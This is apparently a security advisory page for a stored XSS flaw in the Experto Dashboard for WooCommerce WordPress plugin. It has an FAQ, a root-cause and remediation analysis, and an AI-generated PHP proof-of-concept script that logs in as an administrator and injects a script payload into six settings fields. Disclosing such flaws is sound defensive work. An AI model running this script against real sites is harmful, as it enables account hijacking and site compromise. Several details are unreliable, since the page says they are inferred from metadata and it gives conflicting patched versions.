What is CVE-2026-3574?

CVE-2026-3574 is a Stored Cross-Site Scripting (XSS) vulnerability in the Experto Dashboard for WooCommerce plugin for WordPress, affecting versions up to and including 1.0.4. It allows authenticated users with Administrator-level access to inject arbitrary scripts into the plugin’s settings fields.

How does the vulnerability work?

The vulnerability arises from insufficient input sanitization and missing output escaping in the plugin’s settings fields. Attackers can submit malicious scripts through fields like ‘Navigation Font Size’, which are then stored and executed when other users access the settings page.

Who is affected by this vulnerability?

Administrators of WordPress sites using the Experto Dashboard for WooCommerce plugin version 1.0.4 or earlier are affected. This vulnerability particularly impacts multi-site installations or those where unfiltered_html is disabled.

How can I check if my site is vulnerable?

To check if your site is vulnerable, verify the version of the Experto Dashboard for WooCommerce plugin installed. If it is version 1.0.4 or earlier, your site is at risk, especially if it is a multi-site installation.

What is the CVSS score and what does it mean?

The CVSS score for this vulnerability is 4.4, categorized as Medium severity. This indicates that while the vulnerability requires high privileges to exploit, it can still lead to significant security risks if successfully executed.

How can I mitigate or fix this vulnerability?

To mitigate this vulnerability, update the Experto Dashboard for WooCommerce plugin to version 1.0.5 or later, which includes necessary security fixes such as input sanitization and output escaping for vulnerable fields.

What are the potential impacts of exploitation?

Successful exploitation can lead to arbitrary JavaScript execution in the WordPress admin dashboard. This may result in session hijacking, unauthorized actions on behalf of other administrators, or defacement of the admin interface.

What does the proof of concept demonstrate?

The proof of concept illustrates how an attacker can log into a vulnerable WordPress site and submit a malicious payload through the plugin’s settings form. It shows the process of injecting a script that could execute when other administrators view the settings page.

Is this vulnerability specific to certain WordPress installations?

Yes, this vulnerability primarily affects multi-site installations and those where the unfiltered_html capability is disabled. In standard single-site installations, the risk is lower due to WordPress’s built-in protections.

What should I do if I cannot update the plugin immediately?

If an immediate update is not possible, consider disabling the plugin until a secure version can be installed. Additionally, review user permissions to limit access to the plugin settings to trusted administrators only.

Are there any other vulnerabilities associated with this plugin?

While CVE-2026-3574 is the primary known vulnerability, it is advisable to regularly review security advisories related to the Experto Dashboard for WooCommerce plugin and ensure all plugins are kept up to date to minimize risks.

How can I stay informed about future vulnerabilities?

To stay informed, subscribe to security newsletters, follow relevant security blogs, and monitor the WordPress Plugin Repository for updates and advisories related to the plugins you use.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 28, 2026

CVE-2026-3574: Experto Dashboard for WooCommerce <= 1.0.4 – Authenticated (Administrator+) Stored Cross-Site Scripting via 'Navigation Font Size' Setting (experto-custom-dashboard)

CVE ID CVE-2026-3574

Plugin experto-custom-dashboard

Severity Medium (CVSS 4.4)

CWE 79

Vulnerable Version 1.0.4

Patched Version —

Disclosed April 7, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-3574 (metadata-based): This vulnerability affects the Experto Dashboard for WooCommerce plugin for WordPress, versions 1.0.4 and earlier. It is a Stored Cross-Site Scripting (XSS) vulnerability in the plugin’s settings fields, specifically ‘Navigation Font Size’, ‘Navigation Font Weight’, ‘Heading Font Size’, ‘Heading Font Weight’, ‘Text Font Size’, and ‘Text Font Weight’. The CVSS score is 4.4 (MEDIUM), with a vector indicating high attack complexity, high privileges required, but a changed scope and low impact on confidentiality and integrity.

Root Cause: The vulnerability stems from insufficient input sanitization and missing output escaping. The plugin uses register_setting() without a sanitize callback, meaning user-supplied values are not sanitized before storage. Additionally, the field_callback() function outputs these values using printf without esc_attr() escaping. This allows an attacker to inject arbitrary HTML and JavaScript. Because no code diff is available, these conclusions are inferred from the CWE classification (CWE-79) and the vulnerability description.

Exploitation: An attacker with Administrator-level access navigates to the WordPress admin settings page for the plugin (typically /wp-admin/admin.php?page=experto-dashboard-settings or similar). The attacker submits the settings form, injecting a JavaScript payload into one of the vulnerable fields (e.g., Navigation Font Size). The payload is stored in the WordPress options table. The malicious script executes when any user, including other administrators, views the settings page. Since the vulnerability only affects multi-site installations or sites where unfiltered_html is disabled, standard WordPress super admin restrictions are bypassed. The attack vector is the plugin’s settings form submission, likely via POST request to /wp-admin/options.php with the plugin’s option group.

Remediation: The fix (version 1.0.5) likely adds a sanitize callback to register_setting() for each vulnerable option, using WordPress functions like sanitize_text_field() or wp_kses() to strip unwanted HTML. It also adds output escaping in the field_callback() function, wrapping the echoed value in esc_attr() to neutralize any remaining malicious characters.

Impact: Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of the WordPress admin dashboard. This can lead to session hijacking, forced actions on behalf of other administrators (e.g., creating new admin users, modifying site content), or defacement of the admin interface. The scope change in the CVSS vector indicates the attack can affect resources beyond the vulnerable component, such as other admin pages or user interactions.

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-3574 - Experto Dashboard for WooCommerce <= 1.0.4 - Authenticated (Administrator+) Stored XSS

<?php
$target_url = 'http://example.com'; // Change to target WordPress base URL
$admin_username = 'admin';          // Change to admin username
$admin_password = 'password';      // Change to admin password

// Step 1: Login to WordPress as admin
$login_url = $target_url . '/wp-login.php';
$login_data = array(
    'log' => $admin_username,
    'pwd' => $admin_password,
    'rememberme' => 'forever',
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/'
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIEJAR, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
$response = curl_exec($ch);
curl_close($ch);

// Step 2: Get the settings page to obtain a valid nonce (if required)
$settings_page_url = $target_url . '/wp-admin/admin.php?page=experto-dashboard-settings'; // Assumed slug
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $settings_page_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
$response = curl_exec($ch);
curl_close($ch);

// Extract nonce from response (if present)
preg_match('/name="_wpnonce" value="([^"]+)"/', $response, $matches);
$nonce = isset($matches[1]) ? $matches[1] : '';

// Step 3: Inject XSS payload into one of the vulnerable settings
// Payload example: navigation_font_size
$payload = '"><script>alert(/XSS/);</script>'; // Simple alert for demonstration
$options_page_url = $target_url . '/wp-admin/options.php';
$post_data = array(
    'option_page' => 'experto-dashboard-settings', // Assumed option group
    'action' => 'update',
    '_wpnonce' => $nonce,
    'experto_navigation_font_size' => $payload,
    'experto_navigation_font_weight' => $payload,
    'experto_heading_font_size' => $payload,
    'experto_heading_font_weight' => $payload,
    'experto_text_font_size' => $payload,
    'experto_text_font_weight' => $payload
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $options_page_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIEFILE, '/tmp/cookies.txt');
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code == 200 || $http_code == 302) {
    echo "[+] Payload injected successfully. Navigate to settings page to trigger XSS.n";
} else {
    echo "[-] Injection failed. HTTP Code: $http_coden";
}
?>

Frequently Asked Questions

What is CVE-2026-3574?
Overview of the vulnerability
CVE-2026-3574 is a Stored Cross-Site Scripting (XSS) vulnerability in the Experto Dashboard for WooCommerce plugin for WordPress, affecting versions up to and including 1.0.4. It allows authenticated users with Administrator-level access to inject arbitrary scripts into the plugin’s settings fields.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient input sanitization and missing output escaping in the plugin’s settings fields. Attackers can submit malicious scripts through fields like ‘Navigation Font Size’, which are then stored and executed when other users access the settings page.
Who is affected by this vulnerability?
Identifying impacted users
Administrators of WordPress sites using the Experto Dashboard for WooCommerce plugin version 1.0.4 or earlier are affected. This vulnerability particularly impacts multi-site installations or those where unfiltered_html is disabled.
How can I check if my site is vulnerable?
Steps to verify vulnerability
To check if your site is vulnerable, verify the version of the Experto Dashboard for WooCommerce plugin installed. If it is version 1.0.4 or earlier, your site is at risk, especially if it is a multi-site installation.
What is the CVSS score and what does it mean?
Understanding the risk level
The CVSS score for this vulnerability is 4.4, categorized as Medium severity. This indicates that while the vulnerability requires high privileges to exploit, it can still lead to significant security risks if successfully executed.
How can I mitigate or fix this vulnerability?
Recommended actions
To mitigate this vulnerability, update the Experto Dashboard for WooCommerce plugin to version 1.0.5 or later, which includes necessary security fixes such as input sanitization and output escaping for vulnerable fields.
What are the potential impacts of exploitation?
Consequences of successful attacks
Successful exploitation can lead to arbitrary JavaScript execution in the WordPress admin dashboard. This may result in session hijacking, unauthorized actions on behalf of other administrators, or defacement of the admin interface.
What does the proof of concept demonstrate?
Understanding the exploitation method
The proof of concept illustrates how an attacker can log into a vulnerable WordPress site and submit a malicious payload through the plugin’s settings form. It shows the process of injecting a script that could execute when other administrators view the settings page.
Is this vulnerability specific to certain WordPress installations?
Installation-specific risks
Yes, this vulnerability primarily affects multi-site installations and those where the unfiltered_html capability is disabled. In standard single-site installations, the risk is lower due to WordPress’s built-in protections.
What should I do if I cannot update the plugin immediately?
Temporary measures
If an immediate update is not possible, consider disabling the plugin until a secure version can be installed. Additionally, review user permissions to limit access to the plugin settings to trusted administrators only.
Are there any other vulnerabilities associated with this plugin?
Broader security considerations
While CVE-2026-3574 is the primary known vulnerability, it is advisable to regularly review security advisories related to the Experto Dashboard for WooCommerce plugin and ensure all plugins are kept up to date to minimize risks.
How can I stay informed about future vulnerabilities?
Monitoring security updates
To stay informed, subscribe to security newsletters, follow relevant security blogs, and monitor the WordPress Plugin Repository for updates and advisories related to the plugins you use.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations